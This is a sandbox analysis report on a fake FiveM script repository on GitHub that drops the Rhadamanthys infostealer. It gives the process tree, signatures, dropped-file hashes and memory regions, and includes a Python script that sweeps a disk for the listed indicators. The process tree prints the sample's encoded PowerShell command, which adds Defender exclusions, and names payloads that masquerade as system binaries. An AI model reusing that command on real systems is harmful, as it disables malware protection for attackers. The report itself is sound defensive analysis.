Analysis

  • max time kernel
    52s
  • max time network
    55s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240221-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    27-03-2024 17:14

General

  • Target

    https://github.com/Xander3434/SKRIPTGG-FIVEM?tab=readme-ov-file

Malware Config

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++, first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  • Executes dropped EXE (6 IoCs)
  • Loads dropped DLL (14 IoCs)
  • UPX packed file (29 IoCs)

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  • Detects Pyinstaller (7 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry (2 TTPs, 3 IoCs)
  • Kills process with taskkill (1 IoC)
  • Modifies data under HKEY_USERS (2 IoCs)
  • Modifies registry class (1 IoC)
  • NTFS ADS (2 IoCs)
  • Suspicious behavior: EnumeratesProcesses (29 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of FindShellTrayWindow (37 IoCs)
  • Suspicious use of SendNotifyMessage (12 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    PID:2556
    • C:\Windows\SysWOW64\dialer.exe
      "C:\Windows\system32\dialer.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3656
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/Xander3434/SKRIPTGG-FIVEM?tab=readme-ov-file
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2788
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe71de9758,0x7ffe71de9768,0x7ffe71de9778
      2⤵
      PID:4056
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:2
      2⤵
      PID:3608
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
      2⤵
      PID:1892
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
      2⤵
      PID:2572
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2984 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:1
      2⤵
      PID:4988
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:1
      2⤵
      PID:4488
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
      2⤵
      PID:3760
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
      2⤵
      PID:1648
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
      2⤵
      • NTFS ADS
      PID:2228
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=748 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
      2⤵
      PID:1256
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=744 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
      2⤵
      PID:1752
  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
    1⤵
    PID:472
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:4836
  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_SKRIPTGG-FIVEM-main.zip\SKRIPTGG-FIVEM-main\Skript.rar"
    1⤵
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1048
    • C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe"
      2⤵
      • Executes dropped EXE
      PID:3136
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZgBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcgBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAYQBjACMAPgA="
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:692
      • C:\Users\Admin\AppData\Local\Temp\explorer.exe
        "C:\Users\Admin\AppData\Local\Temp\explorer.exe"
        3⤵
        • Executes dropped EXE
        PID:1076
        • C:\Users\Admin\AppData\Local\Temp\explorer.exe
          "C:\Users\Admin\AppData\Local\Temp\explorer.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:4872
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat
            5⤵
            PID:3372
            • C:\Windows\system32\taskkill.exe
              taskkill /f /im "explorer.exe"
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3848
            • C:\Users\Admin\explorer.exe
              "explorer.exe"
              6⤵
              • Executes dropped EXE
              PID:4928
              • C:\Users\Admin\explorer.exe
                "explorer.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                PID:4472
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "ver"
                  8⤵
                  PID:3036
      • C:\Users\Admin\AppData\Local\svchost.exe
        "C:\Users\Admin\AppData\Local\svchost.exe"
        3⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:3468

Network

MITRE ATT&CK Enterprise v15


Downloads


                                  SHA512

                                  07b4f297dd4333bb5014462c23c4020f3c68f66fc78b8316c53b63ca4add13dc737334c94cbe5d22970ec283e45fa2e501593634fbb0830f28fa2a4051af1689

                                • C:\Users\Admin\AppData\Local\Temp\explorer.exe

                                  Filesize

                                  1.2MB

                                  MD5

                                  79a10cb36cbec1e8cd50ffa90e5f8197

                                  SHA1

                                  dd830d2cc28e2940e80f25143032a0e4985fbd80

                                  SHA256

                                  372a4508297b9546c967b67cb2abd4005dc73aeb54258f6a075f49eded5cd7b7

                                  SHA512

                                  5c596d65baa2d5a610d4a2ce372a23795762928debfb90a579fa21d8398578e3d46a345b0a49969d8864375a437d0b46e467bbfb15e7fe9b01173435e75bf08c

                                • C:\Users\Admin\AppData\Local\Temp\explorer.exe

                                  Filesize

                                  1.6MB

                                  MD5

                                  c507a34241e66fe6506b155f5d722d46

                                  SHA1

                                  f4f8488f95342f9355cae76951e7e9f77a5b1ac1

                                  SHA256

                                  ff9a68735435585525e7ac0885c717b202a6b9efd8902f04c3754e6a717bfafa

                                  SHA512

                                  7f5adf399e4dc3e4112a475ba2824e6dde82aa476b800e05bfc0ef7d2339863ceac9d579e1e1bcbf2d822427a8af15ef041ce1794b43b4fecb3764c6d27c9d6d

                                • C:\Users\Admin\AppData\Local\Temp\explorer.exe

                                  Filesize

                                  384KB

                                  MD5

                                  4de4d85fe66551584dd024cdfedd99a3

                                  SHA1

                                  16e5d998d2481573aa8cd9b56dfaf778dd6f1391

                                  SHA256

                                  81b033e5ba8d54c91cbe9c74307d6e76711ea8f8142e8fad5d540507d64fdd6d

                                  SHA512

                                  138381294ee0e94502126973b5f2098fd53edf0b7dd16d31fabc2bdb225e7594d78ed9912e17a5adcf81b2c3b96a669bc62bb46c0be0cc62dfdaf7bbc7a7eba6

                                • C:\Users\Admin\AppData\Local\svchost.exe

                                  Filesize

                                  355KB

                                  MD5

                                  8a6f1580a5b9b94d7cd47cc6b1af1b9a

                                  SHA1

                                  e68768afd59e18091d345cb300e859572e8d4c5c

                                  SHA256

                                  bb1464e75c750d90c0c49d148c9e64eefe0c29b2f670d708c8085ddd3104dbfe

                                  SHA512

                                  1663a9e0868b3f5d7e1edd30259024e419c2d190ec8c31e76e66aef0c8a0e02da0c829584214b9e2f76cbd349a53bf77d01d03e9b0e9c8a99eb18021b1d53309

                                • C:\Users\Admin\Downloads\SKRIPTGG-FIVEM-main.zip

                                  Filesize

                                  5.2MB

                                  MD5

                                  5e65bdca353aeabd62fa725b97e4bcf9

                                  SHA1

                                  045b32c4f5c08e0de0df3a9b519ef5cfa71f5194

                                  SHA256

                                  38c5b0767ba5a3b10ad9a158b3493ae24096c2993994b06783d8f7266e3b4bc2

                                  SHA512

                                  93544f6643222df73bdbb5c8bb08c07f9c595c9c83e8d96066fb73b86d165f1f742bd79e656d5fcc80b4258fd8d566cbb3a44c23fa4e4bb5f5d49a3459dba075

                                • C:\Users\Admin\Downloads\SKRIPTGG-FIVEM-main.zip:Zone.Identifier

                                  Filesize

                                  26B

                                  MD5

                                  fbccf14d504b7b2dbcb5a5bda75bd93b

                                  SHA1

                                  d59fc84cdd5217c6cf74785703655f78da6b582b

                                  SHA256

                                  eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                  SHA512

                                  aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                • C:\Users\Admin\activate.bat

                                  Filesize

                                  91B

                                  MD5

                                  fbcbd43fa00e29f002495e4ab2dc4782

                                  SHA1

                                  75aad7a3fa21226bf37ff89da953743d2b650dc0

                                  SHA256

                                  7a58a034c76b65053744b7d2a443e487e1993aab50642a62f7f388d223e5f648

                                  SHA512

                                  4f26971331fbe1d40e65d493f9417ebcca5e331b61285da2575629b7cd57bdb35ec480cf3ef9a1df48c949360ba9038797575a6181d79b52e1092e4f98bebb3e

                                • C:\Users\Admin\explorer.exe

                                  Filesize

                                  3.4MB

                                  MD5

                                  43f2654a11a6c401cc6f269c8927e360

                                  SHA1

                                  5cf8827830e6a6a627343aca41d891688b85552f

                                  SHA256

                                  10e5693d73b2d5ec2aedb9dcd5a3e9e90c418a4f7301873830329c6994e9016c

                                  SHA512

                                  f4aa1c404dd3c1f773955ddc77f3934803d463da5fd128ea125e51e31a6fbf2cb7daaa2a934108fd3016af1f45bccd181ab00ada5d58428f16e8a0ea3473e575

                                • C:\Users\Admin\explorer.exe

                                  Filesize

                                  3.2MB

                                  MD5

                                  a606769bd3abf93c9dda7abe71b7efb3

                                  SHA1

                                  96b1792b80e1d367b762dabbb4f919997ab811c8

                                  SHA256

                                  d54fa13b463d70e90769a9ef3af2d4b4cb3aac75d91fc51334d89c55d562c3f0

                                  SHA512

                                  6cedf6054f9fed4ee011d2015a06fa50685f1b48ae70222d357868e6d7ec4909f571e7bde6d79f17f06aa0625633131bcd2eeed49533978c413ee9cd1029ae00

                                • C:\Users\Admin\explorer.exe

                                  Filesize

                                  2.9MB

                                  MD5

                                  b90af67ccf0424689dc404df631672ea

                                  SHA1

                                  7e406e8af1a496a41c0d3630e35ca50ed4ba017e

                                  SHA256

                                  b655ee09fc533c10cdf7a8ac06b914614a6a1bc6896ba01b312162ba64aec05b

                                  SHA512

                                  dcc64df0c38ca857b7510718f9176861feb8de55abed09a534660dfbc92a897119c7a555a3571a71f6e59e21175507e14c0d5f884ebbd93cc4b68a9e6c7a743d

                                • \??\pipe\crashpad_2788_DEPCNSNKQIVWQQUW

                                  MD5

                                  d41d8cd98f00b204e9800998ecf8427e

                                  SHA1

                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                  SHA256

                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                  SHA512

                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
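The dropped-files listing above is what a responder would actually sweep other hosts for, and two details in it matter for how that sweep is written. First, several payloads are written under system binary names (explorer.exe in C:\Users\Admin and in AppData\Local\Temp, svchost.exe in AppData\Local), which is a location check independent of any hash. Second, the crashpad pipe entry carries the digests of zero-byte input (MD5 d41d8cd9..., SHA256 e3b0c442...), so a hash list copied blindly from this report would flag every empty file on a host. The script below is an added example for this report, not part of the sandbox output or of the analysed sample. It matches SHA256 against the dropped files listed above (the labels in the table are the sandbox paths, copied from the listing), separately flags system binary names outside a Windows directory, and refuses to match on the empty-input digest. It assumes the tree is readable from Python and that a mounted image keeps its Windows directory name; the PyInstaller `_MEI*` runtime files and the `__PSScriptPolicyTest_*.ps1` file are left out of the indicator set because they also appear with benign PyInstaller programs and PowerShell sessions.

```python
"""Sweep a directory tree for the dropped-file indicators in this report.

Added example, not part of the sandbox report. Assumes the host or a mounted
disk image is readable from Python and that its Windows directory is still
named "Windows" inside the tree being scanned.
"""
import hashlib
import os
from pathlib import PureWindowsPath

# SHA256 values copied from the dropped-files listing above. The right-hand side is the
# path the sandbox saw the file at; it is a label only, the match is on the hash.
DROPPED_SHA256 = {
    "36ecac8ab3ebccbe532cb112dbb71658c66a1dc491cb14e54419ad9082fac2e2": r"Temp\explorer.exe (2.2MB)",
    "372a4508297b9546c967b67cb2abd4005dc73aeb54258f6a075f49eded5cd7b7": r"Temp\explorer.exe (1.2MB)",
    "ff9a68735435585525e7ac0885c717b202a6b9efd8902f04c3754e6a717bfafa": r"Temp\explorer.exe (1.6MB)",
    "81b033e5ba8d54c91cbe9c74307d6e76711ea8f8142e8fad5d540507d64fdd6d": r"Temp\explorer.exe (384KB)",
    "bb1464e75c750d90c0c49d148c9e64eefe0c29b2f670d708c8085ddd3104dbfe": r"AppData\Local\svchost.exe",
    "10e5693d73b2d5ec2aedb9dcd5a3e9e90c418a4f7301873830329c6994e9016c": r"Users\Admin\explorer.exe (3.4MB)",
    "d54fa13b463d70e90769a9ef3af2d4b4cb3aac75d91fc51334d89c55d562c3f0": r"Users\Admin\explorer.exe (3.2MB)",
    "b655ee09fc533c10cdf7a8ac06b914614a6a1bc6896ba01b312162ba64aec05b": r"Users\Admin\explorer.exe (2.9MB)",
    "7a58a034c76b65053744b7d2a443e487e1993aab50642a62f7f388d223e5f648": r"Users\Admin\activate.bat",
    "38c5b0767ba5a3b10ad9a158b3493ae24096c2993994b06783d8f7266e3b4bc2": r"Downloads\SKRIPTGG-FIVEM-main.zip",
}

# SHA256 of zero bytes. The crashpad pipe entry above carries exactly this digest
# (the sandbox hashed an empty stream), so it must never be treated as an indicator:
# matching on it would flag every empty file on the host.
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"

# System binary names the sample reuses for its payloads. The genuine explorer.exe lives
# in C:\Windows and svchost.exe in C:\Windows\System32 (and SysWOW64); a file with one of
# these names anywhere outside a Windows directory is suspicious regardless of hash.
SYSTEM_NAMES = {"explorer.exe", "svchost.exe"}

MAX_BYTES = 64 * 1024 * 1024  # skip very large files; nothing in the listing exceeds 5.2MB


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def lookup_sha256(digest: str):
    """Return the report label for a known dropped-file digest, or None."""
    digest = digest.lower()
    if digest == EMPTY_SHA256:
        return None
    return DROPPED_SHA256.get(digest)


def is_masquerading(path) -> bool:
    """True if a system binary name appears with no Windows directory above it."""
    p = PureWindowsPath(str(path))  # also parses forward-slash paths of a mounted image
    if p.name.lower() not in SYSTEM_NAMES:
        return False
    parents = [part.lower() for part in p.parts[:-1]]
    return "windows" not in parents


def check_entry(path, data: bytes):
    """Classify one file by content hash, then by location; None when nothing matches."""
    digest = sha256_hex(data)
    label = lookup_sha256(digest)
    if label is not None:
        return {"path": str(path), "sha256": digest, "reason": "known dropped file: " + label}
    if is_masquerading(path):
        return {"path": str(path), "sha256": digest,
                "reason": "system binary name outside the Windows directory"}
    return None


def sweep(root):
    """Walk a directory tree and return the list of findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                if os.path.getsize(full) > MAX_BYTES:
                    continue
                with open(full, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable or vanished between listing and open; keep sweeping
            finding = check_entry(full, data)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    import sys
    for hit in sweep(sys.argv[1] if len(sys.argv) > 1 else r"C:\Users"):
        print(hit["reason"], "|", hit["path"], "|", hit["sha256"])
```

Run it against `C:\Users` on a live host or against the mount point of an image; the location check is what catches a re-packed copy of the stealer whose hash no longer matches, while the hash table is what confirms the exact builds this run dropped.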

                                • memory/692-247-0x0000000004B10000-0x0000000004B20000-memory.dmp (Filesize 64KB)
                                • memory/692-378-0x000000007EFB0000-0x000000007EFC0000-memory.dmp (Filesize 64KB)
                                • memory/692-362-0x0000000006D90000-0x0000000006DC4000-memory.dmp (Filesize 208KB)
                                • memory/692-274-0x00000000057F0000-0x0000000005856000-memory.dmp (Filesize 408KB)
                                • memory/692-372-0x0000000006370000-0x000000000638E000-memory.dmp (Filesize 120KB)
                                • memory/692-276-0x0000000005860000-0x00000000058C6000-memory.dmp (Filesize 408KB)
                                • memory/692-239-0x0000000072FA0000-0x0000000073751000-memory.dmp (Filesize 7.7MB)
                                • memory/692-285-0x00000000058D0000-0x0000000005C27000-memory.dmp (Filesize 3.3MB)
                                • memory/692-287-0x0000000005DA0000-0x0000000005DBE000-memory.dmp (Filesize 120KB)
                                • memory/692-388-0x0000000072FA0000-0x0000000073751000-memory.dmp (Filesize 7.7MB)
                                • memory/692-289-0x00000000062E0000-0x000000000632C000-memory.dmp (Filesize 304KB)
                                • memory/692-385-0x0000000007460000-0x0000000007468000-memory.dmp (Filesize 32KB)
                                • memory/692-248-0x0000000005150000-0x000000000577A000-memory.dmp (Filesize 6.2MB)
                                • memory/692-384-0x0000000007440000-0x000000000745A000-memory.dmp (Filesize 104KB)
                                • memory/692-244-0x00000000028C0000-0x00000000028F6000-memory.dmp (Filesize 216KB)
                                • memory/692-383-0x0000000007340000-0x0000000007355000-memory.dmp (Filesize 84KB)
                                • memory/692-382-0x0000000007330000-0x000000000733E000-memory.dmp (Filesize 56KB)
                                • memory/692-361-0x0000000004B10000-0x0000000004B20000-memory.dmp (Filesize 64KB)
                                • memory/692-379-0x00000000072F0000-0x0000000007301000-memory.dmp (Filesize 68KB)
                                • memory/692-377-0x0000000007380000-0x0000000007416000-memory.dmp (Filesize 600KB)
                                • memory/692-376-0x0000000007160000-0x000000000716A000-memory.dmp (Filesize 40KB)
                                • memory/692-374-0x0000000007720000-0x0000000007D9A000-memory.dmp (Filesize 6.5MB)
                                • memory/692-373-0x0000000006DD0000-0x0000000006E74000-memory.dmp (Filesize 656KB)
                                • memory/692-363-0x00000000744B0000-0x00000000744FC000-memory.dmp (Filesize 304KB)
                                • memory/692-354-0x0000000072FA0000-0x0000000073751000-memory.dmp (Filesize 7.7MB)
                                • memory/692-273-0x0000000004EE0000-0x0000000004F02000-memory.dmp (Filesize 136KB)
                                • memory/692-375-0x00000000070E0000-0x00000000070FA000-memory.dmp (Filesize 104KB)
                                • memory/3468-344-0x0000000004200000-0x0000000004600000-memory.dmp (Filesize 4.0MB)
                                • memory/3468-350-0x0000000075620000-0x0000000075872000-memory.dmp (Filesize 2.3MB)
                                • memory/3468-343-0x0000000000DE0000-0x0000000000E4D000-memory.dmp (Filesize 436KB)
                                • memory/3468-342-0x00007FFE80620000-0x00007FFE80829000-memory.dmp (Filesize 2.0MB)
                                • memory/3468-341-0x0000000004200000-0x0000000004600000-memory.dmp (Filesize 4.0MB)
                                • memory/3468-340-0x0000000004200000-0x0000000004600000-memory.dmp (Filesize 4.0MB)
                                • memory/3468-339-0x0000000004200000-0x0000000004600000-memory.dmp (Filesize 4.0MB)
                                • memory/3468-224-0x0000000000DE0000-0x0000000000E4D000-memory.dmp (Filesize 436KB)
                                • memory/3468-422-0x00007FFE80620000-0x00007FFE80829000-memory.dmp (Filesize 2.0MB)
                                • memory/3656-353-0x0000000002D00000-0x0000000003100000-memory.dmp (Filesize 4.0MB)
                                • memory/3656-380-0x0000000002D00000-0x0000000003100000-memory.dmp (Filesize 4.0MB)
                                • memory/3656-359-0x0000000002D00000-0x0000000003100000-memory.dmp (Filesize 4.0MB)
                                • memory/3656-357-0x00007FFE80620000-0x00007FFE80829000-memory.dmp (Filesize 2.0MB)
                                • memory/3656-355-0x0000000002D00000-0x0000000003100000-memory.dmp (Filesize 4.0MB)
                                • memory/3656-351-0x0000000000E90000-0x0000000000E99000-memory.dmp (Filesize 36KB)
                                • memory/3656-360-0x0000000075620000-0x0000000075872000-memory.dmp (Filesize 2.3MB)
                                • memory/3656-381-0x00007FFE80620000-0x00007FFE80829000-memory.dmp (Filesize 2.0MB)
                                • memory/4472-335-0x00007FFE75440000-0x00007FFE75459000-memory.dmp (Filesize 100KB)
                                • memory/4472-400-0x00007FFE77200000-0x00007FFE77224000-memory.dmp (Filesize 144KB)
                                • memory/4472-337-0x00007FFE770F0000-0x00007FFE770FD000-memory.dmp (Filesize 52KB)
                                • memory/4472-333-0x00007FFE771E0000-0x00007FFE771F8000-memory.dmp (Filesize 96KB)
                                • memory/4472-330-0x00007FFE77200000-0x00007FFE77224000-memory.dmp (Filesize 144KB)
                                • memory/4472-328-0x00007FFE7B010000-0x00007FFE7B01F000-memory.dmp (Filesize 60KB)
                                • memory/4472-314-0x00007FFE66A60000-0x00007FFE66EC6000-memory.dmp (Filesize 4.4MB)
                                • memory/4472-415-0x00007FFE66A60000-0x00007FFE66EC6000-memory.dmp (Filesize 4.4MB)
                                • memory/4472-336-0x00007FFE771B0000-0x00007FFE771DC000-memory.dmp (Filesize 176KB)
                                • memory/4472-399-0x00007FFE66A60000-0x00007FFE66EC6000-memory.dmp (Filesize 4.4MB)
                                • memory/4472-389-0x00007FFE66A60000-0x00007FFE66EC6000-memory.dmp (Filesize 4.4MB)
                                • memory/4872-263-0x00007FFE770F0000-0x00007FFE770FF000-memory.dmp (Filesize 60KB)
                                • memory/4872-286-0x00007FFE5C6C0000-0x00007FFE5CB26000-memory.dmp (Filesize 4.4MB)
                                • memory/4872-262-0x00007FFE5FF20000-0x00007FFE5FF44000-memory.dmp (Filesize 144KB)
                                • memory/4872-271-0x00007FFE70D60000-0x00007FFE70D78000-memory.dmp (Filesize 96KB)
                                • memory/4872-246-0x00007FFE5C6C0000-0x00007FFE5CB26000-memory.dmp (Filesize 4.4MB)
                                • memory/4872-272-0x00007FFE5FEF0000-0x00007FFE5FF1C000-memory.dmp (Filesize 176KB)